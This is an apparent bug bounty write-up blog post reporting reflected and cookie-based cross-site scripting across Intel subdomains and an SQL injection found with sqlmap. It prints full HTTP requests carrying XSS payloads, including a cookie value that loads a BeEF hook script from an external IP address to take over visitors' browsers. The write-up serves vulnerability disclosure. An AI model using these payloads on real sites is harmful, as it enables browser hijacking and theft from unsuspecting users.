loading...

Ocak 25, 2018

Intel SQL Injection And XSS On All Subdomains

Greetings,

Summary

I tested XSS on Intel main domain, then “inter_searchTerm” parameter come out. This situation made me suspicious. I tried some XSS payloads in this parameter and i found. I noticed that when I viewed http header information, it was sql injection. This cookie parameter affected the whole domain because it is in all subdomains.

Details

The first request that occurs when I opened the site is;

GET /libs/granite/csrf/token.json HTTP/1.1
Host: www.intel.com.tr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://www.intel.com.tr/content/www/tr/tr/homepage.html
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; ref=; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close

I’m testing continuous other subdomains for prove to vulnerability. I tested other subdomains to prove that all domains could be affected. I first found the reflected XSS with using the OWASP XSS Framework
https://www.intel.ca/content/www/ca/en/search.html?toplevelcategory=none&query={XSS Payload}&keyword=a

XSS filter 🙂

Bypass with javascript:alert(3)

GET /content/www/ca/en/search.results.html?addSocial=true&pageNumber=0&query=javascript%3Aalert(3)&shadowFilters= HTTP/1.1
Host: www.intel.ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json, text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://www.intel.ca/content/www/ca/en/search.html?toplevelcategory=none&query=javascript:alert(3)
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; ref=; JSESSIONID=7ajppcybxlw81kh5mnxpj8crc; BIGipServerlbauto-prd1fm1pcqapp-4503=!8MUTyQc8l9dFzNdsMwHl7nQUJ7GWX2Up5e2qCWtvLVuyT9jCaNlGMUz8GblnVpexRcbTGYJ9cOVr/3Y=;
DNT: 1
Connection: close

Vulnerability On All Subdomain

After, this is new http request;

GET / HTTP/1.1
Host: newsroom.intel.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; intel_searchTerms=[{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]; rxVisitor=1516825112751G6DGT24MQVKRSNLE4CCS5RO8OKP1EFIT; dtPC=7$25148467_104h-vGRFDJAPFPKKJMLMMGADBJNFJOIGNLKVMDK; rxvt=1516826961345|1516825112756; dtSa=-; dtLatC=69; PrefLangIETF=en-US; dtCookie=7$4512B4F8EDABAE08148D7FCE78BDEF6C|RUM+Default+Application|1; ref=; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Vulnerability parameter in cookie;

intel_searchTerms=[{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}];

Now available on all subdomain;

found 2328 subdomains on intel.com. Of course, less of them have running http or https services. Therefore, the number of affected subdomains is less.

Sql Injection

I found sql injection vulnerability with using sqlmap. Taking any data from the database is not eligible under bug bounty scope. Because of that I did not go on, I just left. If I had the opportunity to deal with it, I could run the code.

Exploit

I changed to payload for coming request to BeeF.

POST /_ui/networks/tracking/NetworkTrackingServlet HTTP/1.1
Host: supporttickets.intel.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Referer: https://supporttickets.intel.com/?lang=en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Cookie: detected_bandwidth=HIGH; src_countrycode=TR; intel_searchTerms=[{%22term%22:%22<script%20src=%5C%22http://159.89.186.224:3000/hook.js%5C%22></script>%22%2C%22pages%22:[]}%2C{%22term%22:%22<script%20src=%5C%22http://x:3000/hook.js%5C%22></script>%22%2C%22pages%22:[]}%2C{%22term%22:%22%5C%22><script>alert(document.domain)</script>%22%2C%22pages%22:[]}]; rxVisitor=1516825112751G6DGT24MQVKRSNLE4CCS5RO8OKP1EFIT; dtPC=7$88200515_835h-vGRFDJKSGOIIORLMMGAJMKMHLJVGNLKVWOJ; rxvt=1516890027158|1516888200530; dtSa=-; dtLatC=283; PrefLangIETF=en-US; pctrk=6349d0e9-cbb4-4808-a6f3-fae717f5acc5; ref=; BaseCulture=en-us; dtCookie=7$4512B4F8EDABAE08148D7FCE78BDEF6C|RUM+Default+Application|1; OldBrowsersCookie=Cookie for old browser popup message
DNT: 1
Connection: close

logLines=%5B%7B%22logName%22%20:%20%22network%22,%20%22logLevel%22%20:%20%22INFO%22,%20%22logAttrs%22%20:%20%7B%22pageId%22:%20%220660P000000yK7u%22,%20%22viewId%22:%20%22%22%7D%7D%5D

Came request to my server;

Now, you can send message, execute code, provide access to camera.

PoC

Posted in Bug Bounty, Web Güvenliği, Write-UpTaggs:
Write a comment